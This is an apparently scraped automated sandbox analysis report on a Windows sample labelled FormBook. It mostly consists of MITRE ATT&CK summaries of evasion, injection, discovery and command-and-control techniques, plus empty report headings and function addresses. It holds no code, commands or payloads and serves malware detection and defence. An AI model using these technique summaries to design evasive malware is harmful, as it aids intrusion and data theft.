Instruction Fuzzy Hash: 88F0F632340201BFEB211A45DC06F23BB9AEB44730F150324F628961D1EA62FD2097F4

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report V5cfxBHd71.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Function 004182AC, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57
filenativeCOMMON

Function 00418260, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Function 00409B10, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Function 004181B0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Function 0041838B, Relevance: 1.5, APIs: 1, Instructions: 32
memorynativeCOMMON

Function 00418390, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Function 004182E0, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Function 00418530, Relevance: 1.5, APIs: 1, Instructions: 42
processCOMMON